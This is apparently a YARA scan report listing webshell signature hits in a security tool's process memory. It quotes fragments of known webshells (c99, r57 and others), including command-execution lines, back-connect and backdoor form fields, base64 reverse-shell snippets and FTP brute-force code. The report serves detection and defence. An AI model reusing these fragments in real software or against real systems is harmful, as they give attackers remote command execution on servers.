- 0xb85f:$s1: password
- 0xbde8:$s1: password
- 0xbe10:$s1: password
- 0xbe6d:$s1: password
- 0xd6d6:$s1: password
- 0xdbbf:$s1: password
- 0xdbe7:$s1: password
- 0xdc44:$s1: password
- 0xe63a:$s1: password
- 0xe66a:$s1: password
- 0xe702:$s1: password
- 0xe758:$s1: password
- 0xe788:$s1: password
- 0xe820:$s1: password
- 0xe890:$s1: password
- 0xe8c0:$s1: password
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | cmdjsp_jsp | Semi-Auto-generated - file cmdjsp.jsp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fd2ee:$s0: // note that linux = cmd and windows = "cmd.exe /c + cmd"
- 0x2e137a:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2fd335:$s1: Process p = Runtime.getRuntime().exec("cmd.exe /C " + cmd);
- 0x2dde75:$s2: cmdjsp.jsp
- 0x2ddf77:$s2: cmdjsp.jsp
- 0x2e1291:$s2: cmdjsp.jsp
- 0x2e13db:$s2: cmdjsp.jsp
- 0x2fd24e:$s2: cmdjsp.jsp
- 0x2fd37d:$s2: cmdjsp.jsp
- 0x34083c:$s2: cmdjsp.jsp
- 0x3408e1:$s2: cmdjsp.jsp
- 0x342bc9:$s2: cmdjsp.jsp
- 0x342cac:$s2: cmdjsp.jsp
- 0x356596:$s2: cmdjsp.jsp
- 0x356684:$s2: cmdjsp.jsp
- 0x2f323b:$s3: michaeldaw.org
- 0x2f4258:$s3: michaeldaw.org
- 0x2f7375:$s3: michaeldaw.org
- 0x2fd394:$s3: michaeldaw.org
- 0x308eab:$s3: michaeldaw.org
- 0x308eda:$s3: michaeldaw.org
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | h4ntu_shell__powered_by_tsoi_ | Semi-Auto-generated - file h4ntu shell [powered by tsoi | unknown | - 0x2d4933:$s0: h4ntu shell
- 0x2fd40d:$s0: h4ntu shell
- 0x2fd4c0:$s0: h4ntu shell
- 0x305c75:$s0: h4ntu shell
- 0x305d5b:$s0: h4ntu shell
- 0x33a27d:$s0: h4ntu shell
- 0x3566e3:$s0: h4ntu shell
- 0x356769:$s0: h4ntu shell
- 0x35c91d:$s0: h4ntu shell
- 0x35c9bd:$s0: h4ntu shell
- 0x2fd4d8:$s1: system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
- 0x356777:$s1: system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Ajan_asp | Semi-Auto-generated - file Ajan.asp.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e0bcb:$s1: c:\downloaded.zip
- 0x2e3725:$s1: c:\downloaded.zip
- 0x2fd613:$s1: c:\downloaded.zip
- 0x34276b:$s1: c:\downloaded.zip
- 0x344482:$s1: c:\downloaded.zip
- 0x35685e:$s1: c:\downloaded.zip
- 0x2fd631:$s2: Set entrika = entrika.CreateTextFile("c:\net.vbs", True)
- 0x2fd676:$s3: http://www35.websamba.com/cybervurgun/
- 0x3568ad:$s3: http://www35.websamba.com/cybervurgun/
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PHANTASMA_php | Semi-Auto-generated - file PHANTASMA.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fd79a:$s0: >[*] Safemode Mode Run</DIV>
- 0x35697d:$s0: >[*] Safemode Mode Run</DIV>
- 0x2fd7c3:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>
- 0x35699c:$s1: $file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>
- 0x2fd81c:$s2: [*] Spawning Shell
- 0x3569eb:$s2: [*] Spawning Shell
- 0x2fd83b:$s3: Cha0s
- 0x356a00:$s3: Cha0s
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | MySQL_Web_Interface_Version_0_8_php | Semi-Auto-generated - file MySQL Web Interface Version 0.8.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2f74d7:$s0: SooMin Kim
- 0x2fd96a:$s0: SooMin Kim
- 0x351eb5:$s0: SooMin Kim
- 0x356adb:$s0: SooMin Kim
- 0x2fd981:$s1: http://popeye.snu.ac.kr/~smkim/mysql
- 0x356ae8:$s1: http://popeye.snu.ac.kr/~smkim/mysql
- 0x2fd9b2:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename
- 0x356b0f:$s2: href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename
- 0x2fda03:$s3: <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi
- 0x356b56:$s3: <th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofi
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | simple_cmd_html | Semi-Auto-generated - file simple_cmd.html.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fdb55:$s1: <title>G-Security Webshell</title>
- 0x30debf:$s1: <title>G-Security Webshell</title>
- 0x2fdb84:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x30de7b:$s2: <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
- 0x2fdbc8:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x30deee:$s3: <? if($cmd != "") print Shell_Exec($cmd);?>
- 0x2fdc00:$s4: <? $cmd = $_REQUEST["-cmd"];?>
- 0x30df26:$s4: <? $cmd = $_REQUEST["-cmd"];?>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0001 | Semi-Auto-generated - from files 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fddea:$s0: echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." ("
- 0x356e25:$s0: echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." ("
- 0x2fde3e:$s3: echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x356e6f:$s3: echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0002 | Semi-Auto-generated - from files nst.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe06b:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i
- 0x356ff6:$s0: <tr><form method=post><td><font color=red><b>Back connect:</b></font></td><td><i
- 0x2fe0c8:$s1: $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v
- 0x357049:$s1: $perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4v
- 0x2fe124:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
- 0x35709b:$s2: <tr><form method=post><td><font color=red><b>Backdoor:</b></font></td><td><input
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0003 | Semi-Auto-generated - from files network.php.php.txt, xinfo.php.php.txt, nfm.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe362:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa
- 0x357233:$s0: .textbox { background: White; border: 1px #000000 solid; color: #000099; font-fa
- 0x2fe3bf:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
- 0x357286:$s2: <input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0004 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe618:$s2: echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ft
- 0x35741f:$s2: echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ft
- 0x2fe66b:$s3: $fqb_log .= "\r\n------------------------------------------\r\nDone!\r
- 0x357468:$s3: $fqb_log .= "\r\n------------------------------------------\r\nDone!\r
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0005 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fe942:$s2: 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner o
- 0x35764b:$s2: 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner o
- 0x2fe99c:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
- 0x35769b:$s4: if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0006 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fec38:$s0: "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze"
- 0x357877:$s0: "AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze"
- 0x2fec93:$s2: "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm"
- 0x3578c8:$s2: "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm"
- 0x2fecee:$s4: "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"
- 0x357919:$s4: "R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo"
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0007 | Semi-Auto-generated - from files r577.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fef1c:$s2: echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['
- 0x357aa1:$s2: echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['
- 0x2fef77:$s3: echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db>
- 0x357af2:$s3: echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db>
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0008 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ff251:$s0: if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["
- 0x357cbe:$s0: if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["
- 0x2ff2ab:$s1: if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile
- 0x357d0e:$s1: if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile
- 0x2ff304:$s2: echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_pr
- 0x357d5d:$s2: echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_pr
- 0x2ff35d:$s3: elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($m
- 0x357dac:$s3: elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($m
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0009 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ff64b:$s0: $sess_data["cut"] = array(); c99_s
- 0x357fa6:$s0: $sess_data["cut"] = array(); c99_s
- 0x2ff67a:$s3: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl))
- 0x357fcb:$s3: if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl))
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0010 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2fde43:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x2ff8be:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x356e74:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x358169:$s0: "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".ur
- 0x2ff909:$s2: c99sh_sqlquery
- 0x3581aa:$s2: c99sh_sqlquery
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0011 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2ffb6c:$s0: else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA
- 0x358333:$s0: else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPA
- 0x2ffbc5:$s3: else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspec
- 0x358382:$s3: else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspec
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0012 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2e650f:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x2e6568:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x2ffe46:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x3461ce:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x34621d:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x358529:$s0: echo sr(15,"<b>".$lang[$language.'_text
- 0x2e653a:$s1: .$arrow."</b>",in('text','
- 0x2ffe7a:$s1: .$arrow."</b>",in('text','
- 0x3461f9:$s1: .$arrow."</b>",in('text','
- 0x358553:$s1: .$arrow."</b>",in('text','
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0013 | Semi-Auto-generated - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300088:$s0: 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
- 0x3000ce:$s1: $name='ec371748dc2da624b35a4f8f685dd122'
- 0x3586f7:$s1: $name='ec371748dc2da624b35a4f8f685dd122'
- 0x2f4fc6:$s2: rst.void.ru
- 0x2fbecb:$s2: rst.void.ru
- 0x2fbeef:$s2: rst.void.ru
- 0x300103:$s2: rst.void.ru
- 0x3502e8:$s2: rst.void.ru
- 0x3556e7:$s2: rst.void.ru
- 0x355701:$s2: rst.void.ru
- 0x358722:$s2: rst.void.ru
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0014 | Semi-Auto-generated - from files r577.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300356:$s0: echo ws(2).$lb." <a
- 0x3588b5:$s0: echo ws(2).$lb." <a
- 0x300376:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x31888c:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x3588cb:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x36a38f:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file']
- 0x3003b4:$s3: if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("l
- 0x3588ff:$s3: if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("l
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0015 | Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300645:$s0: if(eregi("./shbd $por",$scan))
- 0x358ad0:$s0: if(eregi("./shbd $por",$scan))
- 0x300670:$s1: $_POST['backconnectip']
- 0x324549:$s1: $_POST['backconnectip']
- 0x358af1:$s1: $_POST['backconnectip']
- 0x3726da:$s1: $_POST['backconnectip']
- 0x300694:$s2: $_POST['backcconnmsg']
- 0x358b0b:$s2: $_POST['backcconnmsg']
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0016 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30094e:$s1: if(rmdir($_POST['mk_name']))
- 0x358ceb:$s1: if(rmdir($_POST['mk_name']))
- 0x300977:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
- 0x358d0a:$s2: $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td>
- 0x3009d2:$s3: if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cell
- 0x358d5b:$s3: if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cell
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0017 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x300c76:$s0: "ext_avi"=>array("ext_avi","ext_mov","ext_mvi
- 0x358f3f:$s0: "ext_avi"=>array("ext_avi","ext_mov","ext_mvi
- 0x300cb0:$s1: echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><inpu
- 0x358f6f:$s1: echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><inpu
- 0x300d03:$s2: "ext_htaccess"=>array("ext_htaccess","ext_htpasswd
- 0x358fb8:$s2: "ext_htaccess"=>array("ext_htaccess","ext_htpasswd
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_php_webshells | Semi-Auto-generated - from files multiple_php_webshells | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x2eacb6:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x301068:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3490dd:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3591db:$s0: kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI
- 0x3010c5:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
- 0x35922e:$s2: sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0
- 0x301122:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
- 0x359281:$s4: A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0019 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x301372:$s0: <b>Dumped! Dump has been writed to
- 0x35942b:$s0: <b>Dumped! Dump has been writed to
- 0x3013a2:$s1: if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE st
- 0x359451:$s1: if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE st
- 0x3013fe:$s2: <input type=submit name=actarcbuff value=\"Pack buffer to archive
- 0x3594a3:$s2: <input type=submit name=actarcbuff value=\"Pack buffer to archive
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0020 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30168c:$s0: @ini_set("highlight
- 0x3016ac:$s1: echo "<b>Result of execution this PHP-code</b>:<br>";
- 0x3016ee:$s2: {$row[] = "<b>Owner/Group</b>";}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0021 | Semi-Auto-generated - from files GFS web-shell ver 3.1.7 - PRiV8.php.txt, nshell.php.php.txt, gfs_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30192c:$s2: echo $uname."</font><br><b>";
- 0x301956:$s3: while(!feof($f)) { $res.=fread($f,1024); }
- 0x30198d:$s4: echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()
- 0x35988a:$s4: echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0022 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x301c33:$s0: c99ftpbrutecheck
- 0x359a56:$s0: c99ftpbrutecheck
- 0x301c50:$s1: $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
- 0x301c90:$s2: $fqb_lenght = $nixpwdperpage;
- 0x301cba:$s3: $sock = @ftp_connect($host,$port,$timeout);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0023 | Semi-Auto-generated - from files w.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x301f31:$s0: $sqlquicklaunch[] = array("
- 0x359c5c:$s0: $sqlquicklaunch[] = array("
- 0x301f59:$s1: else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!<
- 0x359c7a:$s1: else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!<
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0024 | Semi-Auto-generated - from files antichat.php.php.txt, Fatalshell.php.php.txt, a_gedit.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x3021a6:$s0: if(@$_POST['save'])writef($file,$_POST['data']);
- 0x3021e3:$s1: if($action=="phpeval"){
- 0x302207:$s2: $uploadfile = $dirupload."/".$_POST['filename'];
- 0x302244:$s3: $dir=getcwd()."/";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0025 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302444:$s3: if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0026 | Semi-Auto-generated - from files Crystal.php.txt, nshell.php.php.txt, load_shell.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302681:$s0: if ($filename != "." and $filename != ".."){
- 0x311a3b:$s0: if ($filename != "." and $filename != ".."){
- 0x3026ba:$s1: $dires = $dires . $directory;
- 0x3026e4:$s4: $arr = array_merge($arr, glob("*"));
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0027 | Semi-Auto-generated - from files nst.php.php.txt, cybershell.php.php.txt, img.php.php.txt, nstview.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x30295c:$s0: @$rto=$_POST['rto'];
- 0x30297d:$s2: SCROLLBAR-TRACK-COLOR: #91AAFF
- 0x3029a8:$s3: $to1=str_replace("//","/",$to1);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0028 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, dC3 Security Crew Shell PRiV.php.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302c31:$s0: if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":
- 0x35a580:$s0: if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":
- 0x302c86:$s1: $group["execute"] = ($mode & 00010)?"x":"-";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0029 | Semi-Auto-generated - from files c99shell_v1.0.php.php.txt, c99php.txt, 1.txt, c2007.php.php.txt, c100.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x302f41:$s0: $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_php_webshells_2 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, SpecialShell_99.php.php.txt, ctt_sh.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303249:$s0: elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. I
- 0x35a98c:$s0: elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. I
- 0x3032a3:$s1: else {echo "<center><b>Unknown extension (".$ext."), please, select type ma
- 0x35a9dc:$s1: else {echo "<center><b>Unknown extension (".$ext."), please, select type ma
- 0x3032fb:$s3: $s = "!^(".implode("|",$tmp).")$!i";
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0030 | Semi-Auto-generated - from files w.php.php.txt, c99madshell_v2.1.php.php.txt, wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303569:$s0: if ($total === FALSE) {$total = 0;}
- 0x303599:$s1: $free_percent = round(100/($total/$free),2);
- 0x3035d2:$s2: if (!$bool) {$bool = is_dir($letter.":\\");}
- 0x30360b:$s3: $bool = $isdiskette = in_array($letter,$safemode_diskettes);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0031 | Semi-Auto-generated - from files r577.php.php.txt, r57.php.php.txt, spy.php.php.txt, s.php.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303883:$s0: $res = mssql_query("select * from r57_temp_table",$db);
- 0x3038c7:$s2: 'eng_text30'=>'Cat file',
- 0x3038ed:$s3: @mssql_query("drop table r57_temp_table",$db);
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | multiple_webshells_0032 | Semi-Auto-generated - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt | Neo23x0 Yara BRG + customization by Stefan -dfate- Molls | - 0x303b3e:$s0: $num = $nixpasswd + $nixpwdperpage;
- 0x303b6e:$s1: $ret = posix_kill($pid,$sig);
- 0x303b98:$s2: if ($uid) {echo join(":",$uid)."<br>";}
- 0x303bcc:$s3: $i = $nixpasswd;
|
Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DarkSecurityTeam_Webshell | Dark Security Team Webshell | Florian Roth | - 0x303d2a:$s0: form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value="""&HtmlEncode(Server.MapPath("."))&
